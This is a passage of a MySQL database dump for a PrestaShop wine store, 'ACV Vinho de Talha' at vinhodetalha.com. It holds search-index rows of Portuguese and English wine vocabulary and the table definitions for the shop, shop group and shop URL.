(61368, 1, 1, 'francoarenoso'),
(63160, 1, 1, 'francoarenosos'),
(61350, 1, 1, 'frescura'),
(61352, 1, 1, 'fruta'),
(1040, 1, 1, 'frutado'),
(34303, 1, 1, 'fugas'),
(823, 1, 1, 'garrafa'),
(9003, 1, 1, 'garrafas'),
(1039, 1, 1, 'genuino'),
(1377, 1, 1, 'gfa'),
(7411, 1, 1, 'gosto'),
(785, 1, 1, 'grandes'),
(61355, 1, 1, 'granito'),
(59757, 1, 1, 'grupos'),
(2299, 1, 1, 'guarda'),
(7407, 1, 1, 'gustativas'),
(59552, 1, 1, 'historia'),
(2565, 1, 1, 'historica'),
(4136, 1, 1, 'historicamente'),
(1873, 1, 1, 'homenagem'),
(824, 1, 1, 'hora'),
(68787, 1, 1, 'imperdivel'),
(39221, 1, 1, 'inclui'),
(830, 1, 1, 'inicio'),
(64278, 1, 1, 'intensidade'),
(59734, 1, 1, 'interessante'),
(1294, 1, 1, 'interior'),
(2576, 1, 1, 'intervem'),
(59726, 1, 1, 'ira'),
(1299, 1, 1, 'jovem'),
(55901, 1, 1, 'jovens'),
(1878, 1, 1, 'juntou'),
(1892, 1, 1, 'juntou-se'),
(1891, 1, 1, 'juntouse'),
(2319, 1, 1, 'lariao'),
(7414, 1, 1, 'lembramo'),
(7416, 1, 1, 'lembramo-nos'),
(7415, 1, 1, 'lembramonos'),
(1883, 1, 1, 'leve'),
(1386, 1, 1, 'lhe'),
(61938, 1, 1, 'local'),
(61338, 1, 1, 'localizada'),
(1020, 1, 1, 'logo'),
(2298, 1, 1, 'longa'),
(9008, 1, 1, 'longevidade'),
(59758, 1, 1, 'maiores'),
(4151, 1, 1, 'mandam'),
(798, 1, 1, 'mangancha'),
(1880, 1, 1, 'manteudo'),
(3996, 1, 1, 'maravilhosa'),
(39227, 1, 1, 'marcacao'),
(809, 1, 1, 'maximo'),
(63569, 1, 1, 'melhor'),
(787, 1, 1, 'melhores'),
(7412, 1, 1, 'memoria'),
(1305, 1, 1, 'meses'),
(1026, 1, 1, 'mesmos'),
(789, 1, 1, 'metodo'),
(63582, 1, 1, 'mexido'),
(61335, 1, 1, 'millennial'),
(1047, 1, 1, 'minutos'),
(63572, 1, 1, 'missoes'),
(59754, 1, 1, 'modernas'),
(815, 1, 1, 'modo'),
(63574, 1, 1, 'mosto'),
(2295, 1, 1, 'muitos'),
(34307, 1, 1, 'nariz'),
(64269, 1, 1, 'nasceu'),
(11591, 1, 1, 'natal'),
(61367, 1, 1, 'natural'),
(3992, 1, 1, 'neste'),
(4296, 1, 1, 'nivel'),
(804, 1, 1, 'nome'),
(805, 1, 1, 'nos'),
(3994, 1, 1, 'nossa'),
(59724, 1, 1, 'nossas'),
(806, 1, 1, 'nossos'),
(61358, 1, 1, 'nota'),
(827, 1, 1, 'num'),
(1384, 1, 1, 'numa'),
(4289, 1, 1, 'numas'),
(1289, 1, 1, 'numeracao'),
(2575, 1, 1, 'objectos'),
(63577, 1, 1, 'obrigando'),
(63580, 1, 1, 'obter'),
(801, 1, 1, 'obteve'),
(814, 1, 1, 'obteve-se'),
(813, 1, 1, 'obtevese'),
(63573, 1, 1, 'obtivemos'),
(1378, 1, 1, 'oferta'),
(1282, 1, 1, 'olaria'),
(1280, 1, 1, 'oleiro'),
(68788, 1, 1, 'oportunidades'),
(63584, 1, 1, 'originou'),
(1291, 1, 1, 'outa'),
(807, 1, 1, 'outros'),
(1371, 1, 1, 'pack'),
(32738, 1, 1, 'pack2'),
(1376, 1, 1, 'packs'),
(61936, 1, 1, 'palheiro'),
(59554, 1, 1, 'pao'),
(7406, 1, 1, 'papilas'),
(794, 1, 1, 'particular'),
(61337, 1, 1, 'partir'),
(7409, 1, 1, 'passagem'),
(1283, 1, 1, 'patalim'),
(771, 1, 1, 'peculiar'),
(1284, 1, 1, 'pedro'),
(1050, 1, 1, 'pela'),
(63157, 1, 1, 'pelas'),
(61364, 1, 1, 'pelo'),
(2283, 1, 1, 'pelos'),
(792, 1, 1, 'perante'),
(59730, 1, 1, 'perder'),
(1042, 1, 1, 'permite'),
(1046, 1, 1, 'permitido'),
(1038, 1, 1, 'permitiu'),
(1881, 1, 1, 'perrum'),
(7404, 1, 1, 'personalidade'),
(61339, 1, 1, 'perto'),
(59557, 1, 1, 'pessoa'),
(2540, 1, 1, 'pessoas'),
(39222, 1, 1, 'petisco'),
(59550, 1, 1, 'petiscos'),
(4147, 1, 1, 'plantacao'),
(61940, 1, 1, 'plantada'),
(61342, 1, 1, 'plantas'),
(2293, 1, 1, 'podem'),
(1275, 1, 1, 'porcelana'),
(1379, 1, 1, 'portes'),
(15448, 1, 1, 'portugal'),
(783, 1, 1, 'possibilidade'),
(826, 1, 1, 'pouco'),
(2561, 1, 1, 'preco'),
(61346, 1, 1, 'preservar'),
(1027, 1, 1, 'pressupostos'),
(39228, 1, 1, 'previa'),
(2570, 1, 1, 'prevista'),
(812, 1, 1, 'processo'),
(1381, 1, 1, 'producao'),
(2577, 1, 1, 'produtivo'),
(1874, 1, 1, 'produtor'),
(61336, 1, 1, 'produzido'),
(1286, 1, 1, 'produzir'),
(4154, 1, 1, 'profundamente'),
(2568, 1, 1, 'programa'),
(63576, 1, 1, 'prolongada'),
(2937, 1, 1, 'propria'),
(2543, 1, 1, 'prova'),
(59548, 1, 1, 'provar'),
(61343, 1, 1, 'provem'),
(63575, 1, 1, 'provocando'),
(34310, 1, 1, 'publicacao'),
(34304, 1, 1, 'publico'),
(799, 1, 1, 'qualidade'),
(4137, 1, 1, 'quase'),
(59555, 1, 1, 'queijo'),
(4294, 1, 1, 'quer'),
(4005, 1, 1, 'rebeldia'),
(821, 1, 1, 'recomendamos'),
(2571, 1, 1, 'recorre'),
(1295, 1, 1, 'recorremos'),
(63579, 1, 1, 'redobrados'),
(4152, 1, 1, 'regas'),
(2948, 1, 1, 'regiao'),
(59553, 1, 1, 'regionais'),
(55902, 1, 1, 'regional'),
(4288, 1, 1, 'relacao'),
(3997, 1, 1, 'resolvemos'),
(829, 1, 1, 'respirar'),
(1886, 1, 1, 'resulta'),
(1016, 1, 1, 'resultam'),
(1051, 1, 1, 'revista'),
(810, 1, 1, 'rigor'),
(1017, 1, 1, 'rigorosa'),
(2289, 1, 1, 'riquissimo'),
(1292, 1, 1, 'romana'),
(2320, 1, 1, 'roupeiro'),
(1281, 1, 1, 'rui'),
(61340, 1, 1, 'ruinas'),
(62216, 1, 1, 'sabores'),
(63870, 1, 1, 'santa'),
(61941, 1, 1, 'sedoso'),
(59719, 1, 1, 'segredos'),
(59722, 1, 1, 'seguida'),
(59729, 1, 1, 'sem'),
(1298, 1, 1, 'sempre'),
(59721, 1, 1, 'sentidos'),
(2563, 1, 1, 'sera'),
(1287, 1, 1, 'series'),
(2547, 1, 1, 'servidos'),
(816, 1, 1, 'servir'),
(9495, 1, 1, 'siria'),
(59759, 1, 1, 'sob'),
(2306, 1, 1, 'solo'),
(1888, 1, 1, 'solos'),
(7408, 1, 1, 'sorriem'),
(1029, 1, 1, 'sua'),
(59731, 1, 1, 'suas'),
(1041, 1, 1, 'suave'),
(1389, 1, 1, 'suavidade'),
(64281, 1, 1, 'suavizada'),
(1391, 1, 1, 'subtileza'),
(1390, 1, 1, 'sugere'),
(64276, 1, 1, 'surgindo'),
(800, 1, 1, 'surpreendente'),
(791, 1, 1, 'talha'),
(2574, 1, 1, 'talhas'),
(2539, 1, 1, 'tapas'),
(7413, 1, 1, 'tarda'),
(61360, 1, 1, 'tecnicas'),
(4139, 1, 1, 'temos'),
(817, 1, 1, 'temperatura'),
(61345, 1, 1, 'tentando'),
(9004, 1, 1, 'teor'),
(776, 1, 1, 'termos'),
(1884, 1, 1, 'terroir'),
(59720, 1, 1, 'testar'),
(774, 1, 1, 'tinto'),
(7403, 1, 1, 'tintos'),
(62213, 1, 1, 'tipicas'),
(4146, 1, 1, 'toda'),
(781, 1, 1, 'todas'),
(811, 1, 1, 'todo'),
(1014, 1, 1, 'todos'),
(2290, 1, 1, 'tonando'),
(1396, 1, 1, 'torna'),
(1877, 1, 1, 'trabalho'),
(4153, 1, 1, 'tradicao'),
(1033, 1, 1, 'tradicionais'),
(62214, 1, 1, 'transmitindo'),
(1301, 1, 1, 'trincadeira'),
(66152, 1, 1, 'ultimas'),
(795, 1, 1, 'uma'),
(802, 1, 1, 'unico'),
(66153, 1, 1, 'unidades'),
(1277, 1, 1, 'utilizado'),
(796, 1, 1, 'uva'),
(1019, 1, 1, 'uvas'),
(61935, 1, 1, 'vale'),
(1271, 1, 1, 'valido'),
(1036, 1, 1, 'vaz'),
(779, 1, 1, 'veio'),
(59545, 1, 1, 'venha'),
(63155, 1, 1, 'verdadeiro'),
(62215, 1, 1, 'verdadeiros'),
(4001, 1, 1, 'vez'),
(63583, 1, 1, 'vezes'),
(59756, 1, 1, 'viatura'),
(8999, 1, 1, 'vidigueira'),
(61341, 1, 1, 'vila'),
(64279, 1, 1, 'vinda'),
(64271, 1, 1, 'vindima'),
(64275, 1, 1, 'vindimado'),
(64272, 1, 1, 'vindimar'),
(797, 1, 1, 'vinha'),
(59725, 1, 1, 'vinhas'),
(773, 1, 1, 'vinho'),
(788, 1, 1, 'vinhos'),
(790, 1, 1, 'vinificacao'),
(1876, 1, 1, 'vinificadas'),
(59723, 1, 1, 'visita'),
(59546, 1, 1, 'visitar'),
(34309, 1, 1, 'visualizar'),
(61357, 1, 1, 'vol'),
(1890, 1, 1, 'xisto'),
(4140, 1, 1, 'zona'),
(45231, 1, 2, '01012022'),
(55821, 1, 2, '01012023'),
(15050, 1, 2, '01122020'),
(52266, 1, 2, '01122022'),
(5092, 1, 2, '100'),
(6680, 1, 2, '1020'),
(17345, 1, 2, '1040'),
(70587, 1, 2, '1218'),
(16418, 1, 2, '145'),
(4458, 1, 2, '1856'),
(22188, 1, 2, '1928'),
(71018, 1, 2, '1974'),
(4024, 1, 2, '1x1'),
(6431, 1, 2, '2015'),
(5229, 1, 2, '2016'),
(3549, 1, 2, '2017'),
(3848, 1, 2, '2018'),
(69139, 1, 2, '2019'),
(69436, 1, 2, '2022'),
(6427, 1, 2, '2106'),
(70301, 1, 2, '2160'),
(16414, 1, 2, '2208'),
(21009, 1, 2, '2320'),
(27820, 1, 2, '31122021'),
(45232, 1, 2, '31122022'),
(55822, 1, 2, '31122023'),
(17101, 1, 2, '3231'),
(16960, 1, 2, '3400'),
(70455, 1, 2, '3798'),
(70709, 1, 2, '410'),
(17731, 1, 2, '480'),
(70453, 1, 2, '5-year-old'),
(70294, 1, 2, '5050'),
(70852, 1, 2, '5760'),
(17873, 1, 2, '588'),
(70451, 1, 2, '5yearold'),
(16817, 1, 2, '700'),
(16538, 1, 2, '821'),
(17458, 1, 2, '900'),
(17235, 1, 2, '980'),
(70448, 1, 2, 'acidity'),
(5237, 1, 2, 'acv'),
(16116, 1, 2, 'addition'),
(16118, 1, 2, 'adjective'),
(14226, 1, 2, 'age'),
(14938, 1, 2, 'aged'),
(16416, 1, 2, 'alcohol'),
(22930, 1, 2, 'alcoolico'),
(4466, 1, 2, 'alem'),
(4474, 1, 2, 'alentejanas'),
(6562, 1, 2, 'alentejo'),
(6550, 1, 2, 'alice'),
(14225, 1, 2, 'aliment'),
(14703, 1, 2, 'allowed'),
(14827, 1, 2, 'allowing'),
(14708, 1, 2, 'allows'),
(15905, 1, 2, 'almost'),
(14826, 1, 2, 'also'),
(15796, 1, 2, 'always'),
(3566, 1, 2, 'amazing'),
(15051, 1, 2, 'amphora'),
(15910, 1, 2, 'ancient'),
(16412, 1, 2, 'annual'),
(3870, 1, 2, 'ano'),
(18265, 1, 2, 'anphora'),
(4475, 1, 2, 'antao'),
(4171, 1, 2, 'antigas'),
(15058, 1, 2, 'antiquity'),
(22927, 1, 2, 'anual'),
(3885, 1, 2, 'aplicamos'),
(3572, 1, 2, 'apply'),
(15060, 1, 2, 'arabic'),
(4043, 1, 2, 'aragones'),
(15798, 1, 2, 'aragonese'),
(70290, 1, 2, 'aragonez'),
(15907, 1, 2, 'area'),
(4477, 1, 2, 'arinto'),
(70285, 1, 2, 'around'),
(4465, 1, 2, 'atribuido'),
(16114, 1, 2, 'attributed'),
(16020, 1, 2, 'balanced'),
(4036, 1, 2, 'base'),
(14822, 1, 2, 'based'),
(16409, 1, 2, 'beja'),
(4047, 1, 2, 'bem'),
(3556, 1, 2, 'best'),
(4193, 1, 2, 'bland'),
(6821, 1, 2, 'blands'),
(70843, 1, 2, 'blend'),
(14825, 1, 2, 'blended'),
(39380, 1, 2, 'booking'),
(70286, 1, 2, 'born'),
(3584, 1, 2, 'bottle'),
(20802, 1, 2, 'bottled'),
(16415, 1, 2, 'bottles'),
(4172, 1, 2, 'branco'),
(3589, 1, 2, 'breathe'),
(16212, 1, 2, 'buds'),
(14229, 1, 2, 'call'),
(71008, 1, 2, 'care'),
(16115, 1, 2, 'carved'),
(16113, 1, 2, 'carving'),
(54873, 1, 2, 'casta'),
(4170, 1, 2, 'castas'),
(71004, 1, 2, 'causing'),
(70441, 1, 2, 'centuries'),
(70454, 1, 2, 'centuries-old'),
(70452, 1, 2, 'centuriesold'),
(15059, 1, 2, 'challenged'),
(15802, 1, 2, 'characteristic'),
(71002, 1, 2, 'characteristics'),
(16208, 1, 2, 'characterize'),
(14695, 1, 2, 'choice'),
(70140, 1, 2, 'clara'),
(5238, 1, 2, 'classificado'),
(14936, 1, 2, 'classified'),
(15055, 1, 2, 'clay'),
(70583, 1, 2, 'close'),
(3865, 1, 2, 'com'),
(70439, 1, 2, 'come'),
(70296, 1, 2, 'comes'),
(20783, 1, 2, 'commented'),
(3881, 1, 2, 'como'),
(5243, 1, 2, 'companheiro'),
(71010, 1, 2, 'complete'),
(5239, 1, 2, 'comporta'),
(5248, 1, 2, 'comporta-se'),
(5246, 1, 2, 'comportase'),
(70841, 1, 2, 'composed'),
(4335, 1, 2, 'composicao'),
(14700, 1, 2, 'composition'),
(5242, 1, 2, 'conhecermos'),
(3852, 1, 2, 'conseguido'),
(3860, 1, 2, 'conseguirem'),
(7444, 1, 2, 'consensual'),
(71017, 1, 2, 'consequently'),
(22931, 1, 2, 'conservacao'),
(16419, 1, 2, 'conservation'),
(16417, 1, 2, 'content'),
(15915, 1, 2, 'continues'),
(5244, 1, 2, 'conversa'),
(14709, 1, 2, 'conversation'),
(12078, 1, 2, 'copy'),
(55589, 1, 2, 'crops'),
(4181, 1, 2, 'cucufate'),
(5089, 1, 2, 'curval'),
(22187, 1, 2, 'cx6'),
(3878, 1, 2, 'dai'),
(4462, 1, 2, 'datada'),
(70705, 1, 2, 'date'),
(14941, 1, 2, 'dated'),
(15793, 1, 2, 'decided'),
(5241, 1, 2, 'depois'),
(15916, 1, 2, 'determine'),
(6854, 1, 2, 'diagalves'),
(70850, 1, 2, 'differences'),
(14215, 1, 2, 'differentiated'),
(3579, 1, 2, 'directly'),
(3551, 1, 2, 'dispelled'),
(3586, 1, 2, 'dispensed'),
(10227, 1, 2, 'dispensing'),
(3855, 1, 2, 'dissipar'),
(3546, 1, 2, 'doc'),
(3862, 1, 2, 'dos'),
(3552, 1, 2, 'doubts'),
(4472, 1, 2, 'duas'),
(70849, 1, 2, 'due'),
(4655, 1, 2, 'duracao'),
(4460, 1, 2, 'durante'),
(16421, 1, 2, 'duration'),
(3857, 1, 2, 'duvidas'),
(45386, 1, 2, 'edition'),
(15801, 1, 2, 'elegance'),
(15800, 1, 2, 'ended'),
(70297, 1, 2, 'ends'),
(14710, 1, 2, 'entry'),
(70138, 1, 2, 'ermida'),
(6419, 1, 2, 'escolha'),
(5228, 1, 2, 'especial'),
(4459, 1, 2, 'estagiou'),
(3853, 1, 2, 'este'),
(14828, 1, 2, 'even'),
(14218, 1, 2, 'exceptional'),
(15906, 1, 2, 'exclusive'),
(20944, 1, 2, 'experience'),
(20797, 1, 2, 'explanation'),
(70844, 1, 2, 'expresses'),
(71007, 1, 2, 'extra'),
(71016, 1, 2, 'extraction'),
(71011, 1, 2, 'fact'),
(14224, 1, 2, 'fantastic'),
(15803, 1, 2, 'feminine'),
(15918, 1, 2, 'fermentation'),
(70842, 1, 2, 'field'),
(14818, 1, 2, 'finest'),
(16022, 1, 2, 'firm'),
(14935, 1, 2, 'first'),
(70708, 1, 2, 'flavours'),
(15066, 1, 2, 'flexible'),
(4464, 1, 2, 'foi'),
(15057, 1, 2, 'format'),
(4319, 1, 2, 'frades'),
(70449, 1, 2, 'freshness'),
(70450, 1, 2, 'fruit'),
(14705, 1, 2, 'fruity'),
(34318, 1, 2, 'fugas'),
(22928, 1, 2, 'garrafas'),
(14704, 1, 2, 'genuine'),
(4200, 1, 2, 'genuino'),
(3554, 1, 2, 'getting'),
(5232, 1, 2, 'gfa'),
(16021, 1, 2, 'give'),
(3560, 1, 2, 'given'),
(14942, 1, 2, 'giving'),
(3580, 1, 2, 'glass'),
(70447, 1, 2, 'good'),
(3550, 1, 2, 'got'),
(3861, 1, 2, 'grandes'),
(70848, 1, 2, 'granite'),
(3563, 1, 2, 'grape'),
(14696, 1, 2, 'grapes'),
(3555, 1, 2, 'great'),
(14231, 1, 2, 'guard'),
(14697, 1, 2, 'harvest'),
(70292, 1, 2, 'harvested'),
(70289, 1, 2, 'harvesting'),
(3570, 1, 2, 'hence'),
(16025, 1, 2, 'high'),
(20795, 1, 2, 'historical'),
(3590, 1, 2, 'home'),
(3585, 1, 2, 'hour'),
(3581, 1, 2, 'however'),
(16207, 1, 2, 'includes'),
(71015, 1, 2, 'increased'),
(14219, 1, 2, 'indigenous'),
(59749, 1, 2, 'iniciacao'),
(15064, 1, 2, 'inside'),
(70288, 1, 2, 'instead'),
(5245, 1, 2, 'insubstituivel'),
(70295, 1, 2, 'intensity'),
(15919, 1, 2, 'irrigation'),
(14217, 1, 2, 'known'),
(6855, 1, 2, 'lariao'),
(39374, 1, 2, 'least'),
(16215, 1, 2, 'leave'),
(16026, 1, 2, 'level'),
(4463, 1, 2, 'lhe'),
(14830, 1, 2, 'lighter'),
(3587, 1, 2, 'little'),
(70846, 1, 2, 'loam'),
(70434, 1, 2, 'located'),
(14230, 1, 2, 'long'),
(6832, 1, 2, 'longa'),
(71005, 1, 2, 'longer'),
(16028, 1, 2, 'longest'),
(22932, 1, 2, 'longevidade'),
(16420, 1, 2, 'longevity'),
(14698, 1, 2, 'made'),
(14823, 1, 2, 'main'),
(15794, 1, 2, 'make'),
(16119, 1, 2, 'makes'),
(14223, 1, 2, 'making'),
(3564, 1, 2, 'mangancha'),
(6557, 1, 2, 'manteudo'),
(14227, 1, 2, 'many'),
(4040, 1, 2, 'mas'),
(3886, 1, 2, 'maximo'),
(3863, 1, 2, 'melhores'),
(16216, 1, 2, 'memory'),
(4461, 1, 2, 'meses'),
(3558, 1, 2, 'method'),
(3866, 1, 2, 'metodo'),
(69435, 1, 2, 'millennial'),
(10226, 1, 2, 'minutes'),
(71001, 1, 2, 'missions'),
(70287, 1, 2, 'mistake'),
(71012, 1, 2, 'mixed'),
(5103, 1, 2, 'modo'),
(14939, 1, 2, 'months'),
(4034, 1, 2, 'muito'),
(71003, 1, 2, 'must'),
(3571, 1, 2, 'name'),
(70446, 1, 2, 'native'),
(70435, 1, 2, 'near'),
(3880, 1, 2, 'nome'),
(3882, 1, 2, 'nos'),
(3883, 1, 2, 'nossos'),
(4321, 1, 2, 'numa'),
(15061, 1, 2, 'numbered'),
(71009, 1, 2, 'obtain'),
(3569, 1, 2, 'obtained'),
(3876, 1, 2, 'obteve'),
(3890, 1, 2, 'obteve-se'),
(3889, 1, 2, 'obtevese'),
(15497, 1, 2, 'offer'),
(71013, 1, 2, 'often'),
(5086, 1, 2, 'olaria'),
(15908, 1, 2, 'old'),
(5084, 1, 2, 'oleiro'),
(14824, 1, 2, 'one'),
(3583, 1, 2, 'open'),
(10225, 1, 2, 'opening'),
(68820, 1, 2, 'opportunities'),
(3884, 1, 2, 'outros'),
(5226, 1, 2, 'pack'),
(32803, 1, 2, 'pack2'),
(15067, 1, 2, 'packaging'),
(5231, 1, 2, 'packs'),
(69281, 1, 2, 'palheiro'),
(3561, 1, 2, 'particular'),
(16214, 1, 2, 'pass'),
(5087, 1, 2, 'patalim'),
(3545, 1, 2, 'peculiar'),
(5088, 1, 2, 'pedro'),
(20775, 1, 2, 'people'),
(3869, 1, 2, 'perante'),
(14821, 1, 2, 'period'),
(6558, 1, 2, 'perrum'),
(16210, 1, 2, 'personality'),
(16027, 1, 2, 'phenolic'),
(71000, 1, 2, 'philosophy'),
(70580, 1, 2, 'place'),
(15914, 1, 2, 'plantation'),
(70582, 1, 2, 'planted'),
(70438, 1, 2, 'plants'),
(15056, 1, 2, 'porcelain'),
(15499, 1, 2, 'portugal'),
(3859, 1, 2, 'possibilidade'),
(3553, 1, 2, 'possibility'),
(10224, 1, 2, 'pour'),
(14699, 1, 2, 'premises'),
(70851, 1, 2, 'presents'),
(70445, 1, 2, 'preserve'),
(20945, 1, 2, 'price'),
(3575, 1, 2, 'process'),
(3888, 1, 2, 'processo'),
(5236, 1, 2, 'producao'),
(14221, 1, 2, 'produce'),
(70432, 1, 2, 'produced'),
(14817, 1, 2, 'producer'),
(16413, 1, 2, 'production'),
(15922, 1, 2, 'profoundly'),
(15049, 1, 2, 'promotion'),
(68821, 1, 2, 'promotion-'),
(59576, 1, 2, 'prova'),
(34319, 1, 2, 'publico'),
(15496, 1, 2, 'purchasing'),
(15063, 1, 2, 'put'),
(3874, 1, 2, 'qualidade'),
(3567, 1, 2, 'quality'),
(4037, 1, 2, 'que'),
(15912, 1, 2, 'random'),
(16019, 1, 2, 'ratio'),
(15804, 1, 2, 'reb'),
(70300, 1, 2, 'rebellion'),
(3582, 1, 2, 'recommend'),
(3547, 1, 2, 'red'),
(16209, 1, 2, 'reds'),
(70999, 1, 2, 'reflects'),
(20111, 1, 2, 'regiao'),
(16407, 1, 2, 'region'),
(16218, 1, 2, 'remember'),
(39381, 1, 2, 'required'),
(71006, 1, 2, 'requiring'),
(14693, 1, 2, 'result'),
(71014, 1, 2, 'resulted'),
(70293, 1, 2, 'resulting'),
(14222, 1, 2, 'rich'),
(15917, 1, 2, 'right'),
(3573, 1, 2, 'rigor'),
(14694, 1, 2, 'rigorous'),
(14820, 1, 2, 'rigorously'),
(15062, 1, 2, 'roman'),
(10228, 1, 2, 'room'),
(70585, 1, 2, 'rounded'),
(70456, 1, 2, 'roupeiro'),
(5085, 1, 2, 'rui'),
(70436, 1, 2, 'ruins'),
(15920, 1, 2, 'rules'),
(70845, 1, 2, 'sandy'),
(70139, 1, 2, 'santa'),
(15911, 1, 2, 'scattered'),
(14819, 1, 2, 'selected'),
(5091, 1, 2, 'series'),
(10223, 1, 2, 'serve'),
(3577, 1, 2, 'serving'),
(5104, 1, 2, 'servir'),
(3879, 1, 2, 'seu'),
(16411, 1, 2, 'shale'),
(15498, 1, 2, 'shipping'),
(70584, 1, 2, 'silkier'),
(17588, 1, 2, 'siria'),
(5240, 1, 2, 'situacoes'),
(16213, 1, 2, 'smile'),
(14706, 1, 2, 'smooth'),
(16023, 1, 2, 'smoothness'),
(14829, 1, 2, 'smother'),
(39375, 1, 2, 'snack'),
(20794, 1, 2, 'snacks'),
(3858, 1, 2, 'sobre'),
(70298, 1, 2, 'softened'),
(16410, 1, 2, 'soil'),
(70847, 1, 2, 'soils'),
(6840, 1, 2, 'solo'),
(16217, 1, 2, 'soon'),
(3588, 1, 2, 'space'),
(15500, 1, 2, 'spain'),
(14937, 1, 2, 'special'),
(70440, 1, 2, 'stems'),
(15909, 1, 2, 'strains'),
(16018, 1, 2, 'structure'),
(4049, 1, 2, 'sua'),
(4330, 1, 2, 'suavidade'),
(4470, 1, 2, 'subtileza'),
(16120, 1, 2, 'subtlety'),
(4467, 1, 2, 'sugere'),
(16117, 1, 2, 'suggests'),
(3875, 1, 2, 'surpreendente'),
(15052, 1, 2, 'symbolic'),
(3868, 1, 2, 'talha'),
(16211, 1, 2, 'taste'),
(20784, 1, 2, 'tasting'),
(4471, 1, 2, 'tem'),
(3578, 1, 2, 'temperature'),
(22929, 1, 2, 'teor'),
(3851, 1, 2, 'termos'),
(70586, 1, 2, 'terroir'),
(15913, 1, 2, 'throughout'),
(70443, 1, 2, 'thus'),
(14940, 1, 2, 'tile'),
(15797, 1, 2, 'time'),
(3850, 1, 2, 'tinto'),
(3856, 1, 2, 'todas'),
(3887, 1, 2, 'todo'),
(4469, 1, 2, 'torna'),
(5249, 1, 2, 'torna-se'),
(5247, 1, 2, 'tornase'),
(60922, 1, 2, 'tourism'),
(4473, 1, 2, 'tradicionais'),
(20793, 1, 2, 'tradicional'),
(15921, 1, 2, 'tradition'),
(14702, 1, 2, 'traditional'),
(70706, 1, 2, 'transmitting'),
(15799, 1, 2, 'trencher'),
(14815, 1, 2, 'tribute'),
(4027, 1, 2, 'trincadeira'),
(70707, 1, 2, 'true'),
(70444, 1, 2, 'trying'),
(14701, 1, 2, 'two'),
(70299, 1, 2, 'typical'),
(3871, 1, 2, 'uma'),
(3877, 1, 2, 'unico'),
(3568, 1, 2, 'unique'),
(15795, 1, 2, 'unlike'),
(15065, 1, 2, 'use'),
(15054, 1, 2, 'used'),
(70291, 1, 2, 'usual'),
(3872, 1, 2, 'uva'),
(69280, 1, 2, 'vale'),
(15495, 1, 2, 'valid'),
(15053, 1, 2, 'value'),
(14220, 1, 2, 'varieties'),
(15791, 1, 2, 'variety'),
(4476, 1, 2, 'vaz'),
(3854, 1, 2, 'veio'),
(16408, 1, 2, 'vidigueira'),
(70437, 1, 2, 'vila'),
(68886, 1, 2, 'vine'),
(70442, 1, 2, 'vines'),
(3565, 1, 2, 'vineyard'),
(3873, 1, 2, 'vinha'),
(3849, 1, 2, 'vinho'),
(3864, 1, 2, 'vinhos'),
(3867, 1, 2, 'vinificacao'),
(3559, 1, 2, 'vinification'),
(16024, 1, 2, 'want'),
(14216, 1, 2, 'well'),
(16030, 1, 2, 'well-balanced'),
(16029, 1, 2, 'wellbalanced'),
(14707, 1, 2, 'white'),
(3574, 1, 2, 'whole'),
(14816, 1, 2, 'wife'),
(3548, 1, 2, 'wine'),
(3557, 1, 2, 'wines'),
(70581, 1, 2, 'wineyard'),
(15792, 1, 2, 'wonderful'),
(6566, 1, 2, 'xisto'),
(3562, 1, 2, 'year'),
(14228, 1, 2, 'years'),
(70433, 1, 2, 'young');

-- --------------------------------------------------------

--
-- Table structure for table `ps_sekeyword`
--

CREATE TABLE `ps_sekeyword` (
  `id_sekeyword` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `id_shop_group` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `keyword` varchar(256) NOT NULL,
  `date_add` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_shop`
--

CREATE TABLE `ps_shop` (
  `id_shop` int(11) NOT NULL,
  `id_shop_group` int(11) NOT NULL,
  `name` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `id_category` int(11) NOT NULL,
  `theme_name` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `active` tinyint(1) NOT NULL,
  `deleted` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `ps_shop`
--

INSERT INTO `ps_shop` (`id_shop`, `id_shop_group`, `name`, `id_category`, `theme_name`, `active`, `deleted`) VALUES
(1, 1, 'ACV Vinho de Talha', 2, 'PRS01', 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `ps_shop_group`
--

CREATE TABLE `ps_shop_group` (
  `id_shop_group` int(11) NOT NULL,
  `name` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `share_customer` tinyint(1) NOT NULL,
  `share_order` tinyint(1) NOT NULL,
  `share_stock` tinyint(1) NOT NULL,
  `active` tinyint(1) NOT NULL,
  `deleted` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `ps_shop_group`
--

INSERT INTO `ps_shop_group` (`id_shop_group`, `name`, `share_customer`, `share_order`, `share_stock`, `active`, `deleted`) VALUES
(1, 'Default', 0, 0, 0, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `ps_shop_url`
--

CREATE TABLE `ps_shop_url` (
  `id_shop_url` int(11) UNSIGNED NOT NULL,
  `id_shop` int(11) UNSIGNED NOT NULL,
  `domain` varchar(150) NOT NULL,
  `domain_ssl` varchar(150) NOT NULL,
  `physical_uri` varchar(64) NOT NULL,
  `virtual_uri` varchar(64) NOT NULL,
  `main` tinyint(1) NOT NULL,
  `active` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_shop_url`
--

INSERT INTO `ps_shop_url` (`id_shop_url`, `id_shop`, `domain`, `domain_ssl`, `physical_uri`, `virtual_uri`, `main`, `active`) VALUES
(1, 1, 'vinhodetalha.com', 'vinhodetalha.com', '/Store/', '', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_smarty_cache`
--

CREATE TABLE `ps_smarty_cache` (
  `id_smarty_cache` char(40) NOT NULL,
  `name` char(40) NOT NULL,
  `cache_id` varchar(254) DEFAULT NULL,
  `modified` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `content` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smarty_last_flush`
--

CREATE TABLE `ps_smarty_last_flush` (
  `type` enum('compile','template') NOT NULL DEFAULT 'compile',
